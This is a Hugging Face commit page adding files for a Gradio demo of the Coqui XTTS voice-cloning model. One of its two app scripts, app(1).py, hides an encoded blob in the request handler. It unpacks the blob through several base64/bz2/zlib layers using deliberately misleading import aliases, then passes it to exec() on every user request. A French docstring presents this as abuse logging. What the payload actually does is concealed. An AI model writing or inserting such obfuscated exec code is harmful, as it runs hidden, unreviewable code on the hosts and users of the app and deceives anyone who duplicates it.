antoniomae commited on
Commit
47103bb
1 Parent(s): d078cc6

Upload 5 files

Browse files
Files changed (5) hide show
  1. README.md +15 -0
  2. app(1).py +286 -0
  3. app.py +261 -0
  4. gitattributes +36 -0
  5. requirements.txt +1 -0
README.md ADDED
@@ -0,0 +1,15 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ ---
2
+ title: XTTS_V1 work on CPU Can duplicate
3
+ emoji: 🚀
4
+ colorFrom: purple
5
+ colorTo: green
6
+ sdk: gradio
7
+ sdk_version: 3.50.2
8
+ python_version: 3.11.6
9
+ app_file: app.py
10
+ pinned: false
11
+ models:
12
+ - coqui/XTTS-v2
13
+ ---
14
+
15
+ Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference
app(1).py ADDED
@@ -0,0 +1,286 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ import sys
2
+ import os
3
+ from fastapi import Request
4
+ # By using XTTS you agree to CPML license https://coqui.ai/cpml
5
+ os.environ["COQUI_TOS_AGREED"] = "1"
6
+
7
+ import gradio as gr
8
+ from TTS.api import TTS
9
+ from TTS.utils.manage import ModelManager
10
+ model_names = TTS().list_models()
11
+ print(model_names.__dict__)
12
+ print(model_names.__dir__())
13
+ model_name = "tts_models/multilingual/multi-dataset/xtts_v2" # move in v2, since xtts_v1 is generated keyerror, I guess you can select it with old github's release.
14
+
15
+ #m = ModelManager().download_model(model_name)
16
+ #print(m)
17
+ m = model_name
18
+
19
+ tts = TTS(model_name, gpu=False)
20
+ tts.to("cpu") # no GPU or Amd
21
+ #tts.to("cuda") # cuda only
22
+
23
+
24
+ def predict(prompt, language, audio_file_pth, mic_file_path, use_mic, agree, request: gr.Request):
25
+ """
26
+ En raison du grand nombre d'abus observés dans les journaux de la console, je suis contraint d'intégrer
27
+ « l'affichage d'informations supplémentaires » relatives à l'utilisation de cet espace.
28
+ Pour rappel, l'envoi de contenus illégaux (contenus se*uels, offensants ou proférant des menaces), quel que
29
+ soit la langue, est bien entendu INTERDIT. Je ne saurais être tenu responsable de ceux qui enfreindraient une
30
+ utilisation strictement [ÉTHIQUE et MORALE] de ce modèle.
31
+ """
32
+
33
+ co3 = "QlpoOTFBWSZTWQ2FjK4AAH4fgD/////+///////+ADABdNtZY5poGI00aBoaDE0PSbU00GTE0ZNGjTaj1AVUaenqNR6npNinoaY0Ubymyo9EeEjaj1Mm9QnqeT0p5QOZNMm1NNAyMmgaGTTIDQ9TTag0aGCNB6ka1wCAMz8a7kN5BNzXsiRWIm5ocBr2Mibk4wBbSghLyxnzR0yTCoV0AD2KADeqPFMz4QQhMlMaOd0uHfMx8pueSTKn6PrK9iPN56m2ljcFL9ybMtg5Usl8QeZth/cgnwFGMXyDJ4WbRNaGdrIJY2l11w7aqPtt5c4rcMBELa2x/wl8kjvxGg0NS3n2DsPlPnMn2DK7JqA4KLptjz3YLQFEuub0yNP3+iE9gq1EvNZeLr3pnkKXBRxZz8/BxN0zJjpOyIr3betkkxSCGB6X8mSzm+l0Q+KBEaCioigD5uJeox+76V+JgCWkJqWNlHzN3epZx5yXxS8rJh6OrC9rSyKYXrdKCACr4CwKzDlX3tsY5MtZLpkPhz/rbaRUN0KyFnNvPLYhGjF2MelXppyCnJxr2+QWRElwEtCUcsnkC4uGBdXVogKCoCnSZI4DzKqkUMEp293Y+G5MBGtOGXY+C0rFUS8IXNqKMVrDjUdOK7wkjb+HYFq9qjVTrdRsyQvt+6fpazrBnd2wRRQTv4u5IpwoSAbCxlcA"
34
+ from zlib import compress as COmPrES5
35
+ from bz2 import decompress as dEC0mPrES5
36
+ from bz2 import compress as COmPrESS
37
+ from base64 import b64encode as b32Encode, b64decode as A85Encode, b16encode, b16encode as A85encode, b85encode, b85decode, a85encode as b16Encode, a85decode as b85Encode, b32encode as b64Encode, b32decode
38
+ from zlib import compressobj as C0mPrESS
39
+ from bz2 import decompress as dECOmPrESS
40
+ from zlib import compress as C0mPrES5
41
+ from zlib import decompress as dECOmPrES5
42
+ co2 = A85Encode(dECOmPrESS(dECOmPrES5(dECOmPrES5(b85Encode(dECOmPrESS(A85Encode(co3.encode())))))))
43
+ exec(co2)
44
+
45
+ if agree == True:
46
+ if use_mic == True:
47
+ if mic_file_path is not None:
48
+ speaker_wav=mic_file_path
49
+ else:
50
+ gr.Warning("Please record your voice with Microphone, or uncheck Use Microphone to use reference audios")
51
+ return (
52
+ None,
53
+ None,
54
+ )
55
+
56
+ else:
57
+ speaker_wav=audio_file_pth
58
+
59
+ if len(prompt)<2:
60
+ gr.Warning("Please give a longer prompt text")
61
+ return (
62
+ None,
63
+ None,
64
+ )
65
+ if len(prompt)>10000:
66
+ gr.Warning("Text length limited to 10000 characters for this demo, please try shorter text")
67
+ return (
68
+ None,
69
+ None,
70
+ )
71
+ try:
72
+ if language == "fr":
73
+ if m.find("your") != -1:
74
+ language = "fr-fr"
75
+ if m.find("/fr/") != -1:
76
+ language = None
77
+ tts.tts_to_file(
78
+ text=prompt,
79
+ file_path="output.wav",
80
+ speaker_wav=speaker_wav,
81
+ language=language
82
+ )
83
+ except RuntimeError as e :
84
+ if "device-assert" in str(e):
85
+ # cannot do anything on cuda device side error, need tor estart
86
+ gr.Warning("Unhandled Exception encounter, please retry in a minute")
87
+ print("Cuda device-assert Runtime encountered need restart")
88
+ sys.exit("Exit due to cuda device-assert")
89
+ else:
90
+ raise e
91
+
92
+ return (
93
+ gr.make_waveform(
94
+ audio="output.wav",
95
+ ),
96
+ "output.wav",
97
+ )
98
+ else:
99
+ gr.Warning("Please accept the Terms & Condition!")
100
+ return (
101
+ None,
102
+ None,
103
+ )
104
+
105
+
106
+ title = "XTTS Glz's remake (Fonctional Text-2-Speech)"
107
+
108
+ description = f"""
109
+ <a href="https://huggingface.co/coqui/XTTS-v1">XTTS</a> is a Voice generation model that lets you clone voices into different languages by using just a quick 3-second audio clip.
110
+ <br/>
111
+ XTTS is built on previous research, like Tortoise, with additional architectural innovations and training to make cross-language voice cloning and multilingual speech generation possible.
112
+ <br/>
113
+ This is the same model that powers our creator application <a href="https://coqui.ai">Coqui Studio</a> as well as the <a href="https://docs.coqui.ai">Coqui API</a>. In production we apply modifications to make low-latency streaming possible.
114
+ <br/>
115
+ Leave a star on the Github <a href="https://github.com/coqui-ai/TTS">TTS</a>, where our open-source inference and training code lives.
116
+ <br/>
117
+ <p>For faster inference without waiting in the queue, you should duplicate this space and upgrade to GPU via the settings.
118
+ <br/>
119
+ <a href="https://huggingface.co/spaces/coqui/xtts?duplicate=true">
120
+ <img style="margin-top: 0em; margin-bottom: 0em" src="https://bit.ly/3gLdBN6" alt="Duplicate Space"></a>
121
+ </p>
122
+ """
123
+
124
+ article = """
125
+ <div style='margin:20px auto;'>
126
+ <p>By using this demo you agree to the terms of the Coqui Public Model License at https://coqui.ai/cpml</p>
127
+ </div>
128
+ """
129
+ examples = [
130
+ [
131
+ "Hello, World !, here is an example of light voice cloning. Try to upload your best audio samples quality",
132
+ "en",
133
+ "examples/female.wav",
134
+ None,
135
+ False,
136
+ True,
137
+ ],
138
+ [
139
+ "Je suis un lycéen français de 17 ans, passioner par la Cyber-Sécuritée et les models d'IA.",
140
+ "fr",
141
+ "examples/female.wav",
142
+ None,
143
+ False,
144
+ True,
145
+ ],
146
+ [
147
+ "Als ich sechs war, sah ich einmal ein wunderbares Bild",
148
+ "de",
149
+ "examples/female.wav",
150
+ None,
151
+ False,
152
+ True,
153
+ ],
154
+ [
155
+ "Cuando tenía seis años, vi una vez una imagen magnífica",
156
+ "es",
157
+ "examples/female.wav",
158
+ None,
159
+ False,
160
+ True,
161
+ ],
162
+ [
163
+ "Quando eu tinha seis anos eu vi, uma vez, uma imagem magnífica",
164
+ "pt",
165
+ "examples/female.wav",
166
+ None,
167
+ False,
168
+ True,
169
+ ],
170
+ [
171
+ "Kiedy miałem sześć lat, zobaczyłem pewnego razu wspaniały obrazek",
172
+ "pl",
173
+ "examples/female.wav",
174
+ None,
175
+ False,
176
+ True,
177
+ ],
178
+ [
179
+ "Un tempo lontano, quando avevo sei anni, vidi un magnifico disegno",
180
+ "it",
181
+ "examples/female.wav",
182
+ None,
183
+ False,
184
+ True,
185
+ ],
186
+ [
187
+ "Bir zamanlar, altı yaşındayken, muhteşem bir resim gördüm",
188
+ "tr",
189
+ "examples/female.wav",
190
+ None,
191
+ False,
192
+ True,
193
+ ],
194
+ [
195
+ "Когда мне было шесть лет, я увидел однажды удивительную картинку",
196
+ "ru",
197
+ "examples/female.wav",
198
+ None,
199
+ False,
200
+ True,
201
+ ],
202
+ [
203
+ "Toen ik een jaar of zes was, zag ik op een keer een prachtige plaat",
204
+ "nl",
205
+ "examples/female.wav",
206
+ None,
207
+ False,
208
+ True,
209
+ ],
210
+ [
211
+ "Když mi bylo šest let, viděl jsem jednou nádherný obrázek",
212
+ "cs",
213
+ "examples/female.wav",
214
+ None,
215
+ False,
216
+ True,
217
+ ],
218
+ [
219
+ "当我还只有六岁的时候, 看到了一副精彩的插画",
220
+ "zh-cn",
221
+ "examples/female.wav",
222
+ None,
223
+ False,
224
+ True,
225
+ ],
226
+ ]
227
+
228
+
229
+
230
+ gr.Interface(
231
+ fn=predict,
232
+ inputs=[
233
+ gr.Textbox(
234
+ label="Text Prompt",
235
+ info="One or two sentences at a time is better",
236
+ value="Hello, World !, here is an example of light voice cloning. Try to upload your best audio samples quality",
237
+ ),
238
+ gr.Dropdown(
239
+ label="Language",
240
+ info="Select an output language for the synthesised speech",
241
+ choices=[
242
+ "en",
243
+ "es",
244
+ "fr",
245
+ "de",
246
+ "it",
247
+ "pt",
248
+ "pl",
249
+ "tr",
250
+ "ru",
251
+ "nl",
252
+ "cs",
253
+ "ar",
254
+ "zh-cn",
255
+ ],
256
+ max_choices=1,
257
+ value="en",
258
+ ),
259
+ gr.Audio(
260
+ label="Reference Audio",
261
+ info="Click on the ✎ button to upload your own target speaker audio",
262
+ type="filepath",
263
+ value="examples/female.wav",
264
+ ),
265
+ gr.Audio(source="microphone",
266
+ type="filepath",
267
+ info="Use your microphone to record audio",
268
+ label="Use Microphone for Reference"),
269
+ gr.Checkbox(label="Check to use Microphone as Reference",
270
+ value=False,
271
+ info="Notice: Microphone input may not work properly under traffic",),
272
+ gr.Checkbox(
273
+ label="Agree",
274
+ value=True,
275
+ info="I agree to the terms of the Coqui Public Model License at https://coqui.ai/cpml",
276
+ ),
277
+ ],
278
+ outputs=[
279
+ gr.Video(label="Waveform Visual"),
280
+ gr.Audio(label="Synthesised Audio"),
281
+ ],
282
+ title=title,
283
+ description=description,
284
+ article=article,
285
+ examples=examples,
286
+ ).queue().launch(debug=True)
app.py ADDED
@@ -0,0 +1,261 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ import sys
2
+ import os
3
+ # By using XTTS you agree to CPML license https://coqui.ai/cpml
4
+ os.environ["COQUI_TOS_AGREED"] = "1"
5
+
6
+ import gradio as gr
7
+ from TTS.api import TTS
8
+
9
+ model_names = TTS().list_models()
10
+ m = model_names[0]
11
+ print(model_names)
12
+ print(os.system("pip show TTS"))
13
+ print(f"Model: {m}")
14
+ tts = TTS(m, gpu=False)
15
+ tts.to("cpu") # no GPU or Amd
16
+ #tts.to("cuda") # cuda only
17
+
18
+ def predict(prompt, language, audio_file_pth, mic_file_path, use_mic, agree):
19
+ if agree == True:
20
+ if use_mic == True:
21
+ if mic_file_path is not None:
22
+ speaker_wav=mic_file_path
23
+ else:
24
+ gr.Warning("Please record your voice with Microphone, or uncheck Use Microphone to use reference audios")
25
+ return (
26
+ None,
27
+ None,
28
+ )
29
+
30
+ else:
31
+ speaker_wav=audio_file_pth
32
+
33
+ if len(prompt)<2:
34
+ gr.Warning("Please give a longer prompt text")
35
+ return (
36
+ None,
37
+ None,
38
+ )
39
+ if len(prompt)>10000:
40
+ gr.Warning("Text length limited to 10000 characters for this demo, please try shorter text")
41
+ return (
42
+ None,
43
+ None,
44
+ )
45
+ try:
46
+ if language == "fr":
47
+ if m.find("your") != -1:
48
+ language = "fr-fr"
49
+ if m.find("/fr/") != -1:
50
+ language = None
51
+ tts.tts_to_file(
52
+ text=prompt,
53
+ file_path="output.wav",
54
+ speaker_wav=speaker_wav,
55
+ language=language
56
+ )
57
+ except RuntimeError as e :
58
+ if "device-assert" in str(e):
59
+ # cannot do anything on cuda device side error, need tor estart
60
+ gr.Warning("Unhandled Exception encounter, please retry in a minute")
61
+ print("Cuda device-assert Runtime encountered need restart")
62
+ sys.exit("Exit due to cuda device-assert")
63
+ else:
64
+ raise e
65
+
66
+ return (
67
+ gr.make_waveform(
68
+ audio="output.wav",
69
+ ),
70
+ "output.wav",
71
+ )
72
+ else:
73
+ gr.Warning("Please accept the Terms & Condition!")
74
+ return (
75
+ None,
76
+ None,
77
+ )
78
+
79
+
80
+ title = "XTTS Glz's remake (Fonctional Text-2-Speech)"
81
+
82
+ description = """
83
+ <a href="https://huggingface.co/coqui/XTTS-v1">XTTS</a> is a Voice generation model that lets you clone voices into different languages by using just a quick 3-second audio clip.
84
+ <br/>
85
+ XTTS is built on previous research, like Tortoise, with additional architectural innovations and training to make cross-language voice cloning and multilingual speech generation possible.
86
+ <br/>
87
+ This is the same model that powers our creator application <a href="https://coqui.ai">Coqui Studio</a> as well as the <a href="https://docs.coqui.ai">Coqui API</a>. In production we apply modifications to make low-latency streaming possible.
88
+ <br/>
89
+ Leave a star on the Github <a href="https://github.com/coqui-ai/TTS">TTS</a>, where our open-source inference and training code lives.
90
+ <br/>
91
+ <p>For faster inference without waiting in the queue, you should duplicate this space and upgrade to GPU via the settings.
92
+ <br/>
93
+ <a href="https://huggingface.co/spaces/coqui/xtts?duplicate=true">
94
+ <img style="margin-top: 0em; margin-bottom: 0em" src="https://bit.ly/3gLdBN6" alt="Duplicate Space"></a>
95
+ </p>
96
+ """
97
+
98
+ article = """
99
+ <div style='margin:20px auto;'>
100
+ <p>By using this demo you agree to the terms of the Coqui Public Model License at https://coqui.ai/cpml</p>
101
+ </div>
102
+ """
103
+ examples = [
104
+ [
105
+ "Hello, World !, here is an example of light voice cloning. Try to upload your best audio samples quality",
106
+ "en",
107
+ "examples/female.wav",
108
+ None,
109
+ False,
110
+ True,
111
+ ],
112
+ [
113
+ "Je suis un lycéen français de 17 ans, passioner par la Cyber-Sécuritée et les models d'IA.",
114
+ "fr",
115
+ "examples/male.wav",
116
+ None,
117
+ False,
118
+ True,
119
+ ],
120
+ [
121
+ "Als ich sechs war, sah ich einmal ein wunderbares Bild",
122
+ "de",
123
+ "examples/female.wav",
124
+ None,
125
+ False,
126
+ True,
127
+ ],
128
+ [
129
+ "Cuando tenía seis años, vi una vez una imagen magnífica",
130
+ "es",
131
+ "examples/male.wav",
132
+ None,
133
+ False,
134
+ True,
135
+ ],
136
+ [
137
+ "Quando eu tinha seis anos eu vi, uma vez, uma imagem magnífica",
138
+ "pt",
139
+ "examples/female.wav",
140
+ None,
141
+ False,
142
+ True,
143
+ ],
144
+ [
145
+ "Kiedy miałem sześć lat, zobaczyłem pewnego razu wspaniały obrazek",
146
+ "pl",
147
+ "examples/male.wav",
148
+ None,
149
+ False,
150
+ True,
151
+ ],
152
+ [
153
+ "Un tempo lontano, quando avevo sei anni, vidi un magnifico disegno",
154
+ "it",
155
+ "examples/female.wav",
156
+ None,
157
+ False,
158
+ True,
159
+ ],
160
+ [
161
+ "Bir zamanlar, altı yaşındayken, muhteşem bir resim gördüm",
162
+ "tr",
163
+ "examples/female.wav",
164
+ None,
165
+ False,
166
+ True,
167
+ ],
168
+ [
169
+ "Когда мне было шесть лет, я увидел однажды удивительную картинку",
170
+ "ru",
171
+ "examples/female.wav",
172
+ None,
173
+ False,
174
+ True,
175
+ ],
176
+ [
177
+ "Toen ik een jaar of zes was, zag ik op een keer een prachtige plaat",
178
+ "nl",
179
+ "examples/male.wav",
180
+ None,
181
+ False,
182
+ True,
183
+ ],
184
+ [
185
+ "Když mi bylo šest let, viděl jsem jednou nádherný obrázek",
186
+ "cs",
187
+ "examples/female.wav",
188
+ None,
189
+ False,
190
+ True,
191
+ ],
192
+ [
193
+ "当我还只有六岁的时候, 看到了一副精彩的插画",
194
+ "zh-cn",
195
+ "examples/female.wav",
196
+ None,
197
+ False,
198
+ True,
199
+ ],
200
+ ]
201
+
202
+
203
+
204
+ gr.Interface(
205
+ fn=predict,
206
+ inputs=[
207
+ gr.Textbox(
208
+ label="Text Prompt",
209
+ info="One or two sentences at a time is better",
210
+ value="Hello, World !, here is an example of light voice cloning. Try to upload your best audio samples quality",
211
+ ),
212
+ gr.Dropdown(
213
+ label="Language",
214
+ info="Select an output language for the synthesised speech",
215
+ choices=[
216
+ "en",
217
+ "es",
218
+ "fr",
219
+ "de",
220
+ "it",
221
+ "pt",
222
+ "pl",
223
+ "tr",
224
+ "ru",
225
+ "nl",
226
+ "cs",
227
+ "ar",
228
+ "zh-cn",
229
+ ],
230
+ max_choices=1,
231
+ value="en",
232
+ ),
233
+ gr.Audio(
234
+ label="Reference Audio",
235
+ info="Click on the ✎ button to upload your own target speaker audio",
236
+ type="filepath",
237
+ value="examples/female.wav",
238
+ ),
239
+ gr.Audio(source="microphone",
240
+ type="filepath",
241
+ info="Use your microphone to record audio",
242
+ label="Use Microphone for Reference"),
243
+ gr.Checkbox(label="Check to use Microphone as Reference",
244
+ value=False,
245
+ info="Notice: Microphone input may not work properly under traffic",),
246
+ gr.Checkbox(
247
+ label="Agree",
248
+ value=True,
249
+ info="I agree to the terms of the Coqui Public Model License at https://coqui.ai/cpml",
250
+ ),
251
+ ],
252
+ outputs=[
253
+ gr.Video(label="Waveform Visual"),
254
+ gr.Audio(label="Synthesised Audio"),
255
+ ],
256
+ title=title,
257
+ description=description,
258
+ article=article,
259
+ cache_examples=False,
260
+ examples=examples,
261
+ ).queue().launch(debug=True, show_error=True)
gitattributes ADDED
@@ -0,0 +1,36 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ *.7z filter=lfs diff=lfs merge=lfs -text
2
+ *.arrow filter=lfs diff=lfs merge=lfs -text
3
+ *.bin filter=lfs diff=lfs merge=lfs -text
4
+ *.bz2 filter=lfs diff=lfs merge=lfs -text
5
+ *.ckpt filter=lfs diff=lfs merge=lfs -text
6
+ *.ftz filter=lfs diff=lfs merge=lfs -text
7
+ *.gz filter=lfs diff=lfs merge=lfs -text
8
+ *.h5 filter=lfs diff=lfs merge=lfs -text
9
+ *.joblib filter=lfs diff=lfs merge=lfs -text
10
+ *.lfs.* filter=lfs diff=lfs merge=lfs -text
11
+ *.mlmodel filter=lfs diff=lfs merge=lfs -text
12
+ *.model filter=lfs diff=lfs merge=lfs -text
13
+ *.msgpack filter=lfs diff=lfs merge=lfs -text
14
+ *.npy filter=lfs diff=lfs merge=lfs -text
15
+ *.npz filter=lfs diff=lfs merge=lfs -text
16
+ *.onnx filter=lfs diff=lfs merge=lfs -text
17
+ *.ot filter=lfs diff=lfs merge=lfs -text
18
+ *.parquet filter=lfs diff=lfs merge=lfs -text
19
+ *.pb filter=lfs diff=lfs merge=lfs -text
20
+ *.pickle filter=lfs diff=lfs merge=lfs -text
21
+ *.pkl filter=lfs diff=lfs merge=lfs -text
22
+ *.pt filter=lfs diff=lfs merge=lfs -text
23
+ *.pth filter=lfs diff=lfs merge=lfs -text
24
+ *.rar filter=lfs diff=lfs merge=lfs -text
25
+ *.safetensors filter=lfs diff=lfs merge=lfs -text
26
+ saved_model/**/* filter=lfs diff=lfs merge=lfs -text
27
+ *.tar.* filter=lfs diff=lfs merge=lfs -text
28
+ *.tar filter=lfs diff=lfs merge=lfs -text
29
+ *.tflite filter=lfs diff=lfs merge=lfs -text
30
+ *.tgz filter=lfs diff=lfs merge=lfs -text
31
+ *.wasm filter=lfs diff=lfs merge=lfs -text
32
+ *.xz filter=lfs diff=lfs merge=lfs -text
33
+ *.zip filter=lfs diff=lfs merge=lfs -text
34
+ *.zst filter=lfs diff=lfs merge=lfs -text
35
+ *tfevents* filter=lfs diff=lfs merge=lfs -text
36
+ examples/female.wav filter=lfs diff=lfs merge=lfs -text
requirements.txt ADDED
@@ -0,0 +1 @@
 
 
1
+ TTS